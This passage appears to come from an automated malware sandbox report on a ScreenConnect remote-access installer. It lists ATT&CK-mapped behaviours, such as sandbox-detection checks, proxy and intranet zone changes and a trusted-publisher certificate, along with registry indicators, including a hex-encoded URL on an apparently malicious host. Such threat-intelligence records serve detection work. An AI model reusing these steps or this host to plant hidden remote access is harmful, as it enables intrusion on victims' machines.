File opened for modification	C:\Windows\Installer\MSIF83D.tmp	msiexec.exe
File created	C:\Windows\Installer\e57f4e3.msi	msiexec.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

System Location Discovery: System Language Discovery 1 TTPs 11 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	rundll32.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	jsc.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	ScreenConnect.ClientService.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	ScreenConnect.ClientService.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Tx.pif
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	msiexec.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	MsiExec.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	support.Client.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	ScreenConnect.ClientSetup.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	ScreenConnect.ClientService.exe

Checks processor information in registry 2 TTPs 4 IoCs

Processor information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	ScreenConnect.WindowsClient.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	ScreenConnect.WindowsClient.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	ScreenConnect.WindowsClient.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	ScreenConnect.WindowsClient.exe

Modifies data under HKEY_USERS 36 IoCs

description	ioc	Process
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1"	ScreenConnect.WindowsClient.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft	msiexec.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\RestartManager\Session0000\Sequence = "1"	msiexec.exe
Key deleted	\REGISTRY\USER\.DEFAULT\Software\Microsoft\RestartManager\Session0000	msiexec.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1"	ScreenConnect.ClientService.exe
Set value (data)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\RestartManager\Session0000\Owner = dc0600009d866905e2e7da01	msiexec.exe
Set value (data)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\RestartManager\Session0000\SessionHash = 404216a8ed98f8376b948891c7c2d5c46b7970bb63ef573d96b0ad45c1bdcc19	msiexec.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1"	ScreenConnect.ClientService.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\27	msiexec.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\	ScreenConnect.ClientService.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\	ScreenConnect.ClientSetup.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\	ScreenConnect.ClientService.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1"	ScreenConnect.WindowsClient.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1"	ScreenConnect.WindowsClient.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\RestartManager\Session0000	msiexec.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1"	ScreenConnect.ClientService.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1"	ScreenConnect.WindowsClient.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0"	ScreenConnect.WindowsClient.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0"	ScreenConnect.WindowsClient.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1"	ScreenConnect.WindowsClient.exe
Key created	\REGISTRY\USER\.DEFAULT\Software	msiexec.exe
Key deleted	\REGISTRY\USER\.DEFAULT\SOFTWARE\CLASSES\LOCAL SETTINGS\MUICACHE\26\52C64B7E	msiexec.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\	ScreenConnect.WindowsClient.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\	ScreenConnect.WindowsClient.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1"	ScreenConnect.ClientSetup.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1"	ScreenConnect.ClientSetup.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1"	ScreenConnect.ClientService.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1"	ScreenConnect.ClientService.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0"	ScreenConnect.ClientService.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1"	ScreenConnect.ClientService.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1"	ScreenConnect.ClientSetup.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0"	ScreenConnect.ClientSetup.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\RestartManager	msiexec.exe
Key deleted	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26	msiexec.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1"	ScreenConnect.WindowsClient.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0"	ScreenConnect.ClientService.exe

Modifies registry class 64 IoCs

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-21-656926755-4116854191-210765258-1000_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\PackageMetadata\{2ec93463-b0c3-45e1-8364-327e96aea856}_{60051b8f-4f12-400a-8e50-dd05ebd438d1}	dfsvc.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-656926755-4116854191-210765258-1000_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\Marks\scre..ient_4b14c015c87c1ad8_0017.0002_none_fabc737ee69f377c\implication!scre..tion_25b0fbb6ef7eb094_0017.0002_485d = 68747470733a2f2f65646374686d6564752e7365727665626c6f672e6e65742f42696e2f53637265656e436f6e6e6563742e436c69656e742e6170706c69636174696f6e2353637265656e436f6e6e6563742e57696e646f7773436c69656e742e6170706c69636174696f6e2c2056657273696f6e3d32332e322e392e383436362c2043756c747572653d6e65757472616c2c205075626c69634b6579546f6b656e3d323562306662623665663765623039342c2070726f636573736f724172636869746563747572653d6d73696c	dfsvc.exe
Key created	\REGISTRY\USER\S-1-5-21-656926755-4116854191-210765258-1000_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\Installations	dfsvc.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-656926755-4116854191-210765258-1000_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\Components\scre..tion_25b0fbb6ef7eb094_0017.0002_4518e48fe8c220a3\scre..ient_4b14c015c87c1ad8_0017.0002_none_fabc737ee69 = 01	dfsvc.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-656926755-4116854191-210765258-1000_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\Marks\scre...exe_25b0fbb6ef7eb094_0017.0002_none_a93db4211b84e004\lock!1200000000b1570e780200000813000000000000000000006 = 30303030303237382c30316461653765316661656538303030	ScreenConnect.WindowsClient.exe
Key created	\REGISTRY\USER\S-1-5-21-656926755-4116854191-210765258-1000_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\Marks\scre...exe_25b0fbb6ef7eb094_0017.0002_none_a93db4211b84e004	dfsvc.exe
Key created	\REGISTRY\USER\S-1-5-21-656926755-4116854191-210765258-1000_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\Components\scre...exe_25b0fbb6ef7eb094_0017.0002_none_a93db4211b84e004	dfsvc.exe
Key created	\REGISTRY\USER\S-1-5-21-656926755-4116854191-210765258-1000_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\Assemblies	ScreenConnect.WindowsClient.exe
Key created	\REGISTRY\USER\S-1-5-21-656926755-4116854191-210765258-1000_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\Marks\scre..ient_4b14c015c87c1ad8_0017.0002_none_fabc737ee69f377c	dfsvc.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-656926755-4116854191-210765258-1000_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\Marks\scre..dows_4b14c015c87c1ad8_0017.0002_none_691eed8e139df4a8\implication!scre..tion_25b0fbb6ef7eb094_0017.0002_485d = 68747470733a2f2f65646374686d6564752e7365727665626c6f672e6e65742f42696e2f53637265656e436f6e6e6563742e436c69656e742e6170706c69636174696f6e2353637265656e436f6e6e6563742e57696e646f7773436c69656e742e6170706c69636174696f6e2c2056657273696f6e3d32332e322e392e383436362c2043756c747572653d6e65757472616c2c205075626c69634b6579546f6b656e3d323562306662623665663765623039342c2070726f636573736f724172636869746563747572653d6d73696c	dfsvc.exe
Key created	\REGISTRY\USER\S-1-5-21-656926755-4116854191-210765258-1000_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\Components\scre..tion_25b0fbb6ef7eb094_0017.0002_4518e48fe8c220a3\scre..dows_4b14c015c87c1ad8_0017.0002_none_691eed8e139	dfsvc.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\4F9B841DA981CA3448AB330C42ED8319\SourceList\Media	msiexec.exe
Key created	\REGISTRY\USER\S-1-5-21-656926755-4116854191-210765258-1000_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide	ScreenConnect.WindowsClient.exe
Key created	\REGISTRY\MACHINE\Software\Classes\CLSID\{6FF59A85-BC37-4CD4-F729-E0B76340D43B}	msiexec.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Installer\UpgradeCodes\F69B68EBC5C7E714370A22D780F91E39\4F9B841DA981CA3448AB330C42ED8319	msiexec.exe
Key created	\REGISTRY\USER\S-1-5-21-656926755-4116854191-210765258-1000_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0	dfsvc.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-656926755-4116854191-210765258-1000_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\Components\scre...exe_25b0fbb6ef7eb094_0017.0002_none_a93db4211b84e004\DigestMethod = 01	dfsvc.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-656926755-4116854191-210765258-1000_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\Components\scre..dows_4b14c015c87c1ad8_0017.0002_none_691eed8e139df4a8\DigestValue = b023b69348bb06c4b4ad67bee0f55bb9cfb3748c	dfsvc.exe
Key created	\REGISTRY\USER\S-1-5-21-656926755-4116854191-210765258-1000_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\Components\scre..core_4b14c015c87c1ad8_0017.0002_none_64a715acd74fe178	dfsvc.exe
Key created	\REGISTRY\USER\S-1-5-21-656926755-4116854191-210765258-1000_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\Components	ScreenConnect.WindowsClient.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\4F9B841DA981CA3448AB330C42ED8319\SourceList\Net	msiexec.exe
Key created	\REGISTRY\USER\S-1-5-21-656926755-4116854191-210765258-1000_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\StateManager\Families	dfsvc.exe
Key created	\REGISTRY\USER\S-1-5-21-656926755-4116854191-210765258-1000_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\PackageMetadata\{2ec93463-b0c3-45e1-8364-327e96aea856}_{3f471841-eef2-47d6-89c0-d028f03a4ad5}\scre..tion_25b0fbb6ef7eb09	dfsvc.exe
Key created	\REGISTRY\USER\S-1-5-21-656926755-4116854191-210765258-1000_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\Components\scre..ient_4b14c015c87c1ad8_0017.0002_none_c5edeed0c033c485\Files	dfsvc.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-656926755-4116854191-210765258-1000_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\Marks\scre..ient_4b14c015c87c1ad8_0017.0002_none_c5edeed0c033c485\lock!0e00000099af570ee4000000d810000000000000000000001 = 30303030303065342c30316461653765316633633864393839	dfsvc.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-656926755-4116854191-210765258-1000_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\Marks\scre..tion_25b0fbb6ef7eb094_0017.0002_none_4a31edb78203a9e7\lock!0400000099af570ee4000000d810000000000000000000001 = 30303030303065342c30316461653765316633633864393839	dfsvc.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Installer\UpgradeCodes\F69B68EBC5C7E714370A22D780F91E39	msiexec.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\4F9B841DA981CA3448AB330C42ED8319\SourceList	msiexec.exe
Key created	\REGISTRY\USER\S-1-5-21-656926755-4116854191-210765258-1000_Classes\Software	dfsvc.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-656926755-4116854191-210765258-1000_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\Marks\scre..ient_4b14c015c87c1ad8_0017.0002_none_c5edeed0c033c485\identity = 53637265656e436f6e6e6563742e57696e646f7773436c69656e742c2056657273696f6e3d32332e322e392e383436362c2043756c747572653d6e65757472616c2c205075626c69634b6579546f6b656e3d344231344330313543383743314144382c2070726f636573736f724172636869746563747572653d6d73696c	dfsvc.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-656926755-4116854191-210765258-1000_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\Components\scre...exe_25b0fbb6ef7eb094_0017.0002_none_a93db4211b84e004\DigestValue = a229e0582dc95272bc15acd59b73b5b6c8c5abcd	dfsvc.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-656926755-4116854191-210765258-1000_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\Components\scre..tion_25b0fbb6ef7eb094_0017.0002_4518e48fe8c220a3\SubstructureCreated = 01	dfsvc.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\4F9B841DA981CA3448AB330C42ED8319\DeploymentFlags = "3"	msiexec.exe
Key created	\REGISTRY\USER\S-1-5-21-656926755-4116854191-210765258-1000_Classes\Software\Microsoft\Windows	dfsvc.exe
Key created	\REGISTRY\USER\S-1-5-21-656926755-4116854191-210765258-1000_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\Components\scre..tion_25b0fbb6ef7eb094_0017.0002_4518e48fe8c220a3\scre..ient_4b14c015c87c1ad8_0017.0002_none_c5edeed0c03	dfsvc.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-656926755-4116854191-210765258-1000_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\StateManager\Applications\scre..tion_25b0fbb6ef7eb094_0017.0002_4518e48fe8c220a3\PreparedForExecution = 01	dfsvc.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-656926755-4116854191-210765258-1000_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\Marks\scre..ient_4b14c015c87c1ad8_0017.0002_none_c5edeed0c033c485\implication!scre..tion_25b0fbb6ef7eb094_0017.0002_485d = 68747470733a2f2f65646374686d6564752e7365727665626c6f672e6e65742f42696e2f53637265656e436f6e6e6563742e436c69656e742e6170706c69636174696f6e2353637265656e436f6e6e6563742e57696e646f7773436c69656e742e6170706c69636174696f6e2c2056657273696f6e3d32332e322e392e383436362c2043756c747572653d6e65757472616c2c205075626c69634b6579546f6b656e3d323562306662623665663765623039342c2070726f636573736f724172636869746563747572653d6d73696c	dfsvc.exe
Key created	\REGISTRY\USER\S-1-5-21-656926755-4116854191-210765258-1000_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\Components\scre..tion_25b0fbb6ef7eb094_0017.0002_4518e48fe8c220a3	dfsvc.exe
Key created	\REGISTRY\USER\S-1-5-21-656926755-4116854191-210765258-1000_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\Components\scre..tion_25b0fbb6ef7eb094_0017.0002_4518e48fe8c220a3\scre..vice_4b14c015c87c1ad8_0017.0002_none_15faadf56d0	dfsvc.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-656926755-4116854191-210765258-1000_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\Components\scre..tion_25b0fbb6ef7eb094_0017.0002_4518e48fe8c220a3\scre...exe_25b0fbb6ef7eb094_0017.0002_none_a93db4211b8 = 01	dfsvc.exe
Key created	\REGISTRY\USER\S-1-5-21-656926755-4116854191-210765258-1000_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\StateManager\Families\Gi_scre..tion_25b0fbb6ef7eb094_9edfe039055229dd	ScreenConnect.WindowsClient.exe
Key created	\REGISTRY\USER\S-1-5-21-656926755-4116854191-210765258-1000_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\Components\scre..tion_25b0fbb6ef7eb094_0017.0002_485d45469159a919	dfsvc.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-656926755-4116854191-210765258-1000_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\Marks\scre..tion_25b0fbb6ef7eb094_0017.0002_none_4a31edb78203a9e7\lock!1000000000b1570e780200000813000000000000000000006 = 30303030303237382c30316461653765316661656538303030	ScreenConnect.WindowsClient.exe
Key created	\REGISTRY\USER\S-1-5-21-656926755-4116854191-210765258-1000_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\Components	dfsvc.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-656926755-4116854191-210765258-1000_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\Marks\scre...exe_25b0fbb6ef7eb094_0017.0002_none_a93db4211b84e004\identity = 53637265656e436f6e6e6563742e57696e646f7773436c69656e742e6578652c2056657273696f6e3d32332e322e392e383436362c2043756c747572653d6e65757472616c2c205075626c69634b6579546f6b656e3d323562306662623665663765623039342c2070726f636573736f724172636869746563747572653d6d73696c2c20747970653d77696e3332	dfsvc.exe
Key created	\REGISTRY\USER\S-1-5-21-656926755-4116854191-210765258-1000_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\PackageMetadata	ScreenConnect.WindowsClient.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-656926755-4116854191-210765258-1000_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\Marks\scre..ient_4b14c015c87c1ad8_0017.0002_none_c5edeed0c033c485\lock!1a00000000b1570e780200000813000000000000000000006 = 30303030303237382c30316461653765316661656538303030	ScreenConnect.WindowsClient.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\sc-73a0227d089fe193\shell\open\command\ = "\"C:\\Program Files (x86)\\ScreenConnect Client (73a0227d089fe193)\\ScreenConnect.WindowsClient.exe\" \"%1\""	msiexec.exe
Key created	\REGISTRY\USER\S-1-5-21-656926755-4116854191-210765258-1000_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\Components\scre..tion_25b0fbb6ef7eb094_0017.0002_none_4a31edb78203a9e7	dfsvc.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-656926755-4116854191-210765258-1000_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\Components\scre..tion_25b0fbb6ef7eb094_0017.0002_4518e48fe8c220a3\scre..dows_4b14c015c87c1ad8_0017.0002_none_691eed8e139 = 01	dfsvc.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Classes\sc-73a0227d089fe193\UseOriginalUrlEncoding = "1"	msiexec.exe
Key created	\REGISTRY\USER\S-1-5-21-656926755-4116854191-210765258-1000_Classes\Software\Microsoft	dfsvc.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-656926755-4116854191-210765258-1000_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\Marks\scre...exe_25b0fbb6ef7eb094_0017.0002_none_a93db4211b84e004\lock!010000009fae570ee4000000d810000000000000000000000 = 30303030303065342c30316461653765316633633864393839	dfsvc.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-656926755-4116854191-210765258-1000_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\PackageMetadata\{2ec93463-b0c3-45e1-8364-327e96aea856}_{3f471841-eef2-47d6-89c0-d028f03a4ad5}\scre..tion_25b0fbb6ef7eb09 = 30000000	dfsvc.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-656926755-4116854191-210765258-1000_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\Marks\scre..core_4b14c015c87c1ad8_0017.0002_none_64a715acd74fe178\identity = 53637265656e436f6e6e6563742e436f72652c2056657273696f6e3d32332e322e392e383436362c2043756c747572653d6e65757472616c2c205075626c69634b6579546f6b656e3d344231344330313543383743314144382c2070726f636573736f724172636869746563747572653d6d73696c	dfsvc.exe
Key created	\REGISTRY\USER\S-1-5-21-656926755-4116854191-210765258-1000_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\Marks\scre..ient_4b14c015c87c1ad8_0017.0002_none_c5edeed0c033c485	dfsvc.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-656926755-4116854191-210765258-1000_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\Components\scre..vice_4b14c015c87c1ad8_0017.0002_none_15faadf56d0f44e3\identity = 53637265656e436f6e6e6563742e436c69656e74536572766963652c2056657273696f6e3d32332e322e392e383436362c2043756c747572653d6e65757472616c2c205075626c69634b6579546f6b656e3d344231344330313543383743314144382c2070726f636573736f724172636869746563747572653d6d73696c	dfsvc.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-656926755-4116854191-210765258-1000_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\Components\scre..vice_4b14c015c87c1ad8_0017.0002_none_15faadf56d0f44e3\DigestMethod = 01	dfsvc.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-656926755-4116854191-210765258-1000_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\Components\scre..ient_4b14c015c87c1ad8_0017.0002_none_fabc737ee69f377c\DigestMethod = 01	dfsvc.exe
Key created	\REGISTRY\USER\S-1-5-21-656926755-4116854191-210765258-1000_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\VisibilityRoots	ScreenConnect.WindowsClient.exe
Key created	\REGISTRY\USER\S-1-5-21-656926755-4116854191-210765258-1000_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\Categories	dfsvc.exe
Key created	\REGISTRY\USER\S-1-5-21-656926755-4116854191-210765258-1000_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\Components\scre..dows_4b14c015c87c1ad8_0017.0002_none_691eed8e139df4a8\Files	dfsvc.exe
Key created	\REGISTRY\USER\S-1-5-21-656926755-4116854191-210765258-1000_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment	dfsvc.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-656926755-4116854191-210765258-1000_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\PackageMetadata\{2ec93463-b0c3-45e1-8364-327e96aea856}_{3f471841-eef2-47d6-89c0-d028f03a4ad5}\scre..tion_25b0fbb6ef7eb09 = 68747470733a2f2f65646374686d6564752e7365727665626c6f672e6e65742f42696e2f53637265656e436f6e6e6563742e436c69656e742e6170706c69636174696f6e2353637265656e436f6e6e6563742e57696e646f7773436c69656e742e6170706c69636174696f6e2c2056657273696f6e3d32332e322e392e383436362c2043756c747572653d6e65757472616c2c205075626c69634b6579546f6b656e3d323562306662623665663765623039342c2070726f636573736f724172636869746563747572653d6d73696c2f53637265656e436f6e6e6563742e57696e646f7773436c69656e742e6578652c2056657273696f6e3d32332e322e392e383436362c2043756c747572653d6e65757472616c2c205075626c69634b6579546f6b656e3d323562306662623665663765623039342c2070726f636573736f724172636869746563747572653d6d73696c2c20747970653d77696e3332	dfsvc.exe

Modifies system certificate store 2 TTPs 6 IoCs

evasion spyware trojan

Install Root Certificate

T1553.004

Modify Registry

T1112

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-21-656926755-4116854191-210765258-1000\SOFTWARE\Microsoft\SystemCertificates\TrustedPublisher\Certificates\4C2272FBA7A7380F55E2A424E9E624AEE1C14579	support.Client.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-656926755-4116854191-210765258-1000\SOFTWARE\Microsoft\SystemCertificates\TrustedPublisher\Certificates\4C2272FBA7A7380F55E2A424E9E624AEE1C14579\Blob = 0300000001000000140000004c2272fba7a7380f55e2a424e9e624aee1c145792000000001000000640700003082076030820548a00302010202100b9360051bccf66642998998d5ba97ce300d06092a864886f70d01010b05003069310b300906035504061302555331173015060355040a130e44696769436572742c20496e632e3141303f060355040313384469676943657274205472757374656420473420436f6465205369676e696e67205253413430393620534841333834203230323120434131301e170d3232303831373030303030305a170d3235303831353233353935395a3065310b30090603550406130255533110300e06035504081307466c6f72696461310e300c0603550407130554616d706131193017060355040a1310436f6e6e656374776973652c204c4c433119301706035504031310436f6e6e656374776973652c204c4c4330820222300d06092a864886f70d01010105000382020f003082020a0282020100ec489826d08d2c6de21b3cd3676db1e0e50cb1ff75ff564e9741f9574aa3640aa8297294a05b4db68abd0760b6b05b50ce92ff42a4e390be776a43e9961c722f6b3a4d5c880bcc6a61b4026f9137d36b2b7e9b86055876b9fa860dbcb164fe7f4b5b9de4799ae4e02dc1f0bee01e5d032933a2827388f8db0b482e76c441b1bd50909ef2023e1fb62196c994ce052266b28cd89253e6416044133139764db5fc45702529536bf82c775f9ec81fa27dc409530325f40cdef95b81b9ce0d42791cee72e7bd1b36c257b52257c65a28970e457513989434bfc239e2992b193e1b3cc3f11ccdd1d26d4ec9845099ab913906a42069af999c0071169b45a2ea1aa666f1904e8acb05e1823a359a291fd46b4ef7aed5935bb6ab17ebf077210726930c90f01761d6544a94e8fa614cc41d817eec734b1c3d3afb7c58fb256f0c09edc1459bddbff9940ed1958570265d67af79a9b6a16affd70fc6328c9810d5dc186e39af6fbcad49a270f237e6bcd5de0bc014bc3179cd79776591340311a42ca94f33416c2e01b59bd1d71de86ace6716bc90b2d7695d155039aa08fbac19a4d93fb784230a20a485287a16355645fc09142c602d140fa046b7bfd75328184ff7bdf8f9e0d65e6201c8d242931047f59bd328ac353777ccefa60408887b84fc3631301463461a1d73c0b5cc74d6d82905d